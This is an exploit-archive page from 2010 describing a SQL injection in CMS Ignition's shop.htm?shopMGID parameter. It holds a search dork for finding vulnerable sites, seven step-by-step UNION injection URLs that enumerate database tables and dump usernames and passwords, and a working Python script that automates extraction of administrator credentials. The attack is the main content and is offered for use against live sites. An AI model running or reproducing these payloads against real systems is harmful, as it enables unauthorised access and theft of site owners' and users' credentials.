CMS Ignition SQL Injection

CMS Ignition SQL Injection: Posted Jul 26, 2010; Authored by Neavorc; CMS Ignition suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 03c0470ef1e1dba6af2c26304f9863eb2654a230b43b92c7139ef6a9dd46055b; Download | Favorite | View

CMS Ignition SQL Injection

|------------------------------------------------|
| neavorc[@]gmail[dot]com                        |
==================================================
 
[+] SQL Injection Vulnerability
[+] Dorks: allinurl:"shop.htm?shopMGID="
[+] Bug in shop.htm?shopMGID
[+] Exploit: http://www.site.com/shop.htm?shopMGID=XXXX (see below python exploit)
[+]
==================================================
 
Step[1]:
Error
http://www.site.com/shop.htm?shopMGID=9999'
 
Step[2]:
Number of columns
http://www.site.com/shop.htm?shopMGID=9999+order+by+1--
 
Step[3]:
Output of numbers
http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,3,4,5--
 
Step[4]:
Collect informations
http://www.site.com/shop.htm?shopMGID=-9999+union+select+version(),database(),3,4,5+from+information_schema.columns--
 
Step[5]:
If version is
5.0.67-community
5.0.32-Debian_7etch8-log
5.0.40-log
http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5+from+information_schema.columns--
 
Step[6]:
Increment zero in "limit+0,1--" until you have interesting tables and columns
http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5+from+information_schema.columns+limit+0,1--
 
Step[7]:
Get the content
(fiction tables in this example)
http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,username,password),4,5+user--
 
==================================================
 
[+] Contact:
    - neavorc[at]gmail.com
 
==================================================
Discovered by NEAVORC
Cheers'n'Oi
 
==================================================
 
# Exploit Title:    CMS Ignition SQL Injection
# Date:         25/08/2010  [DD:MM:JJJJ]
# Author:       NEAVORC
# Software Link:    http://www.finegrafix.co.za/
#           http://www.finegrafix.co.za/cmsignition.htm
# Dork:         Dorks: allinurl:"shop.htm?shopMGID="   
 
import urllib ,sys,os
if len(sys.argv)!=2:
    os.system('cls')
    os.system('clear')
    print "==============================================================================="
    print "==============   CMSignition Exploit  ||| NEAVORC[@]gmail[.]com ==============="
    print "==============================================================================="
    print "== Take the Admin username and the password from the tagrt page              =="
    print "=Usage: ./exploit.py <injection>                                             =="
    print "=Exmpl: ./exploit.py <http://www.site.com/shop.htm?shopMGID=131>  =="
    print "==============================================================================="
    sys.exit(1)
global url,end,injection,i 
url = sys.argv[1]
url = url.replace("=","=-")
end = "+from+adminUsers--"
injection = "+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,0x6F7574707574,username,password,0x6861636B6564),22,23,24,25,26,27,28,29,"
os.system('cls')
print "==============================================================================="
print "=================   SQLi   Exploit  ||| NEAVORC[@]gmail[.]com ================="
print "==============================================================================="
print "==                         Exploiting Please wait...                         =="
print "==============================================================================="
 
if url[:7] != "http://":
    print "Url correction...."
    url = "http://"+url
    print "To : "+url
try:
    i = 30
    while i <=70:
        global full_inj
        injection = injection+str(i)+","
        full_inj = url+injection[:-1]+end
        f = urllib.urlopen(full_inj)
        s = f.read()
        if "output:" in s:
            begin = int(s.find("output"))
            end = int(s.find("hacked"))
            columns = full_inj[-20:-18]
            os.system('cls')
            print "==============================================================================="
            print "=================   SQLi   Exploit  ||| NEAVORC[@]gmail[.]com ================="
            print "==============================================================================="    
            print "=================   Administrator: "+s[begin:end-1]
            print "=================   Columns: "+columns
            print "==============================================================================="
            print "==============             Exploit by NEAVORC[at]gmail.com          ==========="
        i = i+1
except(TypeError):
    exit

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

CMS Ignition SQL Injection

CMS Ignition SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMS Ignition SQL Injection

Share This

CMS Ignition SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems